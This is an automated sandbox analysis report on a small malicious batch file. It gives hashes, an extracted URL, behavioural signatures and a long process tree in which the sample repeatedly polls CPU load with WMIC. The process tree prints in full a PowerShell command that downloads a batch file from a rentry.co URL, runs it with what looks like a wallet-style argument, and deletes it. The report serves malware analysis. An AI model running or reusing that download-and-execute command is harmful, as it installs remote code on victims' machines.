Analysis
-
max time kernel
123s -
max time network
52s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2024 02:47
Static task
static1
Behavioral task
behavioral1
Sample
166845832680.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
166845832680.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
166845832680.bat
Resource
win11-20240508-en
General
-
Target
166845832680.bat
-
Size
517B
-
MD5
ac9d73455d58bfa42f81e718b8c8d6b5
-
SHA1
60040fff333b7bc09b22e5c013f11b8a99555ed3
-
SHA256
4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
-
SHA512
ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2
Malware Config
Extracted
https://rentry.co/regele/raw
Signatures
-
Delays execution with timeout.exe 64 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 3224 timeout.exe 8 timeout.exe 3320 timeout.exe 2900 timeout.exe 4476 timeout.exe 1972 timeout.exe 808 timeout.exe 4704 timeout.exe 456 timeout.exe 2060 timeout.exe 312 timeout.exe 4328 timeout.exe 4536 timeout.exe 1808 timeout.exe 3188 timeout.exe 452 timeout.exe 4940 timeout.exe 3420 timeout.exe 968 timeout.exe 5052 timeout.exe 2068 timeout.exe 528 timeout.exe 1644 timeout.exe 3980 timeout.exe 948 timeout.exe 548 timeout.exe 3284 timeout.exe 2068 timeout.exe 4000 timeout.exe 4024 timeout.exe 4264 timeout.exe 1556 timeout.exe 4680 timeout.exe 2240 timeout.exe 3324 timeout.exe 1612 timeout.exe 2308 timeout.exe 3552 timeout.exe 2972 timeout.exe 1312 timeout.exe 1104 timeout.exe 4792 timeout.exe 3052 timeout.exe 4928 timeout.exe 1604 timeout.exe 4364 timeout.exe 4996 timeout.exe 3980 timeout.exe 4932 timeout.exe 5112 timeout.exe 3464 timeout.exe 452 timeout.exe 2756 timeout.exe 2932 timeout.exe 2900 timeout.exe 1528 timeout.exe 4576 timeout.exe 4212 timeout.exe 2240 timeout.exe 4992 timeout.exe 2448 timeout.exe 2364 timeout.exe 2980 timeout.exe 972 timeout.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1892 powershell.exe 1892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1892 powershell.exe Token: SeIncreaseQuotaPrivilege 4232 WMIC.exe Token: SeSecurityPrivilege 4232 WMIC.exe Token: SeTakeOwnershipPrivilege 4232 WMIC.exe Token: SeLoadDriverPrivilege 4232 WMIC.exe Token: SeSystemProfilePrivilege 4232 WMIC.exe Token: SeSystemtimePrivilege 4232 WMIC.exe Token: SeProfSingleProcessPrivilege 4232 WMIC.exe Token: SeIncBasePriorityPrivilege 4232 WMIC.exe Token: SeCreatePagefilePrivilege 4232 WMIC.exe Token: SeBackupPrivilege 4232 WMIC.exe Token: SeRestorePrivilege 4232 WMIC.exe Token: SeShutdownPrivilege 4232 WMIC.exe Token: SeDebugPrivilege 4232 WMIC.exe Token: SeSystemEnvironmentPrivilege 4232 WMIC.exe Token: SeRemoteShutdownPrivilege 4232 WMIC.exe Token: SeUndockPrivilege 4232 WMIC.exe Token: SeManageVolumePrivilege 4232 WMIC.exe Token: 33 4232 WMIC.exe Token: 34 4232 WMIC.exe Token: 35 4232 WMIC.exe Token: 36 4232 WMIC.exe Token: SeIncreaseQuotaPrivilege 4232 WMIC.exe Token: SeSecurityPrivilege 4232 WMIC.exe Token: SeTakeOwnershipPrivilege 4232 WMIC.exe Token: SeLoadDriverPrivilege 4232 WMIC.exe Token: SeSystemProfilePrivilege 4232 WMIC.exe Token: SeSystemtimePrivilege 4232 WMIC.exe Token: SeProfSingleProcessPrivilege 4232 WMIC.exe Token: SeIncBasePriorityPrivilege 4232 WMIC.exe Token: SeCreatePagefilePrivilege 4232 WMIC.exe Token: SeBackupPrivilege 4232 WMIC.exe Token: SeRestorePrivilege 4232 WMIC.exe Token: SeShutdownPrivilege 4232 WMIC.exe Token: SeDebugPrivilege 4232 WMIC.exe Token: SeSystemEnvironmentPrivilege 4232 WMIC.exe Token: SeRemoteShutdownPrivilege 4232 WMIC.exe Token: SeUndockPrivilege 4232 WMIC.exe Token: SeManageVolumePrivilege 4232 WMIC.exe Token: 33 4232 WMIC.exe Token: 34 4232 WMIC.exe Token: 35 4232 WMIC.exe Token: 36 4232 WMIC.exe Token: SeIncreaseQuotaPrivilege 1872 WMIC.exe Token: SeSecurityPrivilege 1872 WMIC.exe Token: SeTakeOwnershipPrivilege 1872 WMIC.exe Token: SeLoadDriverPrivilege 1872 WMIC.exe Token: SeSystemProfilePrivilege 1872 WMIC.exe Token: SeSystemtimePrivilege 1872 WMIC.exe Token: SeProfSingleProcessPrivilege 1872 WMIC.exe Token: SeIncBasePriorityPrivilege 1872 WMIC.exe Token: SeCreatePagefilePrivilege 1872 WMIC.exe Token: SeBackupPrivilege 1872 WMIC.exe Token: SeRestorePrivilege 1872 WMIC.exe Token: SeShutdownPrivilege 1872 WMIC.exe Token: SeDebugPrivilege 1872 WMIC.exe Token: SeSystemEnvironmentPrivilege 1872 WMIC.exe Token: SeRemoteShutdownPrivilege 1872 WMIC.exe Token: SeUndockPrivilege 1872 WMIC.exe Token: SeManageVolumePrivilege 1872 WMIC.exe Token: 33 1872 WMIC.exe Token: 34 1872 WMIC.exe Token: 35 1872 WMIC.exe Token: 36 1872 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 432 wrote to memory of 1892 432 cmd.exe powershell.exe PID 432 wrote to memory of 1892 432 cmd.exe powershell.exe PID 432 wrote to memory of 5084 432 cmd.exe cmd.exe PID 432 wrote to memory of 5084 432 cmd.exe cmd.exe PID 5084 wrote to memory of 4232 5084 cmd.exe WMIC.exe PID 5084 wrote to memory of 4232 5084 cmd.exe WMIC.exe PID 432 wrote to memory of 452 432 cmd.exe timeout.exe PID 432 wrote to memory of 452 432 cmd.exe timeout.exe PID 432 wrote to memory of 1900 432 cmd.exe cmd.exe PID 432 wrote to memory of 1900 432 cmd.exe cmd.exe PID 1900 wrote to memory of 1872 1900 cmd.exe WMIC.exe PID 1900 wrote to memory of 1872 1900 cmd.exe WMIC.exe PID 432 wrote to memory of 2448 432 cmd.exe timeout.exe PID 432 wrote to memory of 2448 432 cmd.exe timeout.exe PID 432 wrote to memory of 2368 432 cmd.exe cmd.exe PID 432 wrote to memory of 2368 432 cmd.exe cmd.exe PID 2368 wrote to memory of 4764 2368 cmd.exe WMIC.exe PID 2368 wrote to memory of 4764 2368 cmd.exe WMIC.exe PID 432 wrote to memory of 2068 432 cmd.exe timeout.exe PID 432 wrote to memory of 2068 432 cmd.exe timeout.exe PID 432 wrote to memory of 3416 432 cmd.exe cmd.exe PID 432 wrote to memory of 3416 432 cmd.exe cmd.exe PID 3416 wrote to memory of 4244 3416 cmd.exe WMIC.exe PID 3416 wrote to memory of 4244 3416 cmd.exe WMIC.exe PID 432 wrote to memory of 4928 432 cmd.exe timeout.exe PID 432 wrote to memory of 4928 432 cmd.exe timeout.exe PID 432 wrote to memory of 2188 432 cmd.exe cmd.exe PID 432 wrote to memory of 2188 432 cmd.exe cmd.exe PID 2188 wrote to memory of 4808 2188 cmd.exe WMIC.exe PID 2188 wrote to memory of 4808 2188 cmd.exe WMIC.exe PID 432 wrote to memory of 3552 432 cmd.exe timeout.exe PID 432 wrote to memory of 3552 432 cmd.exe timeout.exe PID 432 wrote to memory of 2360 432 cmd.exe cmd.exe PID 432 wrote to memory of 2360 432 cmd.exe cmd.exe PID 2360 wrote to memory of 4656 2360 cmd.exe WMIC.exe PID 2360 wrote to memory of 4656 2360 cmd.exe WMIC.exe PID 432 wrote to memory of 2980 432 cmd.exe timeout.exe PID 432 wrote to memory of 2980 432 cmd.exe timeout.exe PID 432 wrote to memory of 1456 432 cmd.exe cmd.exe PID 432 wrote to memory of 1456 432 cmd.exe cmd.exe PID 1456 wrote to memory of 4728 1456 cmd.exe WMIC.exe PID 1456 wrote to memory of 4728 1456 cmd.exe WMIC.exe PID 432 wrote to memory of 2972 432 cmd.exe timeout.exe PID 432 wrote to memory of 2972 432 cmd.exe timeout.exe PID 432 wrote to memory of 1052 432 cmd.exe cmd.exe PID 432 wrote to memory of 1052 432 cmd.exe cmd.exe PID 1052 wrote to memory of 4612 1052 cmd.exe WMIC.exe PID 1052 wrote to memory of 4612 1052 cmd.exe WMIC.exe PID 432 wrote to memory of 2756 432 cmd.exe timeout.exe PID 432 wrote to memory of 2756 432 cmd.exe timeout.exe PID 432 wrote to memory of 4624 432 cmd.exe cmd.exe PID 432 wrote to memory of 4624 432 cmd.exe cmd.exe PID 4624 wrote to memory of 1220 4624 cmd.exe WMIC.exe PID 4624 wrote to memory of 1220 4624 cmd.exe WMIC.exe PID 432 wrote to memory of 3224 432 cmd.exe timeout.exe PID 432 wrote to memory of 3224 432 cmd.exe timeout.exe PID 432 wrote to memory of 396 432 cmd.exe cmd.exe PID 432 wrote to memory of 396 432 cmd.exe cmd.exe PID 396 wrote to memory of 4488 396 cmd.exe WMIC.exe PID 396 wrote to memory of 4488 396 cmd.exe WMIC.exe PID 432 wrote to memory of 528 432 cmd.exe timeout.exe PID 432 wrote to memory of 528 432 cmd.exe timeout.exe PID 432 wrote to memory of 3588 432 cmd.exe cmd.exe PID 432 wrote to memory of 3588 432 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\166845832680.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage2⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage3⤵
-
C:\Windows\system32\timeout.exetimeout /t 12⤵
- Delays execution with timeout.exe
-
